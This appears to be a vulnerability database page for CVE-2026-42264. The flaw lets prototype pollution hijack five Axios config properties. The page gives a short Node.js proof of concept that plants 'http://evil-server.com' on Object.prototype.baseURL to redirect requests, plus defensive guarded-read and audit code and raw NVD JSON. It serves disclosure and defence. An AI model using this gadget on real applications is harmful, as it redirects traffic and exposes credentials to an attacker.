Security Vulnerability Report
CVE-2026-42264 CVSS 7.4 HIGH


Published: 2026-05-08 04:16:20
Last Modified: 2026-05-08 16:02:14

Description

Axios is a promise based HTTP client for the browser and Node.js. From version 1.0.0 to before version 1.15.2, five config properties (auth, baseURL, socketPath, beforeRedirect, and insecureHTTPParser) in the HTTP adapter are read via direct property access without hasOwnProperty guards, making them exploitable as prototype pollution gadgets. When Object.prototype is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request. This issue has been patched in version 1.15.2.

CVSS Details

CVSS Score: 7.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Affected versions (per the description): Axios >= 1.0.0, < 1.15.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
The PoC is Node.js JavaScript (the original label "python" was wrong). It omits baseURL from the per-request config on purpose: an own property on the request config would take precedence, so the polluted Object.prototype value only matters where the config carries no baseURL of its own.

```javascript
// Simulate prototype pollution by another dependency in the same process
Object.prototype.baseURL = "http://evil-server.com";

// Vulnerable Axios usage (version < 1.15.2)
const axios = require('axios');

// The application's intended base URL lives in the defaults; the request
// config below deliberately carries no own baseURL property
axios.defaults.baseURL = 'https://api.example.com';

// Intended to request https://api.example.com/user
axios.get('/user')
  .then(response => {
    // Actually requests http://evil-server.com/user: the HTTP adapter reads
    // config.baseURL without a hasOwnProperty guard, so the polluted
    // Object.prototype.baseURL is picked up
    console.log('Data:', response.data);
  })
  .catch(err => {
    console.error(err);
  })
  .finally(() => {
    // Cleanup for demonstration, run only after the request has completed so
    // the polluted value is still present while axios builds the URL
    delete Object.prototype.baseURL;
  });
```
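The unguarded read pattern the description blames beside the guarded read that a hasOwnProperty check gives, plus a startup audit for the five gadget keys, as an added example that is not axios's own code: the helper names (readConfigUnsafe, readConfigSafe, auditPrototypePollution, demonstrate) and the polluted value are constructed here.

```javascript
// Added example (not axios code): unguarded vs guarded config reads for the
// five gadget keys named in CVE-2026-42264, plus a startup audit. All helper
// names are assumed for this demonstration.
const AXIOS_GADGET_KEYS = ['auth', 'baseURL', 'socketPath', 'beforeRedirect', 'insecureHTTPParser'];

// Vulnerable pattern: plain property access walks the prototype chain, so a
// polluted Object.prototype value is returned whenever the config object
// has no own property of that name.
function readConfigUnsafe(config, key) {
  return config[key];
}

// Hardened pattern (what a hasOwnProperty guard gives you): only an own
// property is honoured; anything inherited from Object.prototype is ignored.
function readConfigSafe(config, key) {
  return Object.prototype.hasOwnProperty.call(config, key) ? config[key] : undefined;
}

// Defender check: which gadget keys has some other code already planted on
// Object.prototype? Run at startup or in a test suite; a non-empty result
// means every outbound request of an unpatched axios would be affected.
function auditPrototypePollution(keys = AXIOS_GADGET_KEYS) {
  return keys.filter(key => key in Object.prototype);
}

// Simulate pollution of one key by a hypothetical third-party dependency
// (constructed value), compare both read patterns, then clean up so the
// process is not left polluted.
function demonstrate(key, pollutedValue, config) {
  Object.prototype[key] = pollutedValue;
  try {
    return {
      polluted: auditPrototypePollution(),
      unsafe: readConfigUnsafe(config, key),
      safe: readConfigSafe(config, key),
    };
  } finally {
    delete Object.prototype[key];
  }
}

// Request config without its own baseURL: the unguarded read leaks the
// polluted value, the guarded read does not.
console.log(demonstrate('baseURL', 'http://evil-server.com', { url: '/user' }));
```

The audit is the cheap check to run when a dependency tree is known to contain a prototype-pollution-prone package and axios cannot yet be upgraded to 1.15.2.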

References

https://github.com/axios/axios/commit/47915144662f2733e6c051bdcb895a8c8f0586aa
https://github.com/axios/axios/pull/10779
https://github.com/axios/axios/releases/tag/v1.15.2
https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-42264",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-08T04:16:20.313",
    "lastModified": "2026-05-08T16:02:14.343",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Axios is a promise based HTTP client for the browser and Node.js. From version 1.0.0 to before version 1.15.2, fFive config properties (auth, baseURL, socketPath, beforeRedirect, and insecureHTTPParser) in the HTTP adapter are read via direct property access without hasOwnProperty guards, making them exploitable as prototype pollution gadgets. When Object.prototype is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request. This issue has been patched in version 1.15.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-1321"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/axios/axios/commit/47915144662f2733e6c051bdcb895a8c8f0586aa",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/axios/axios/pull/10779",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/axios/axios/releases/tag/v1.15.2",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```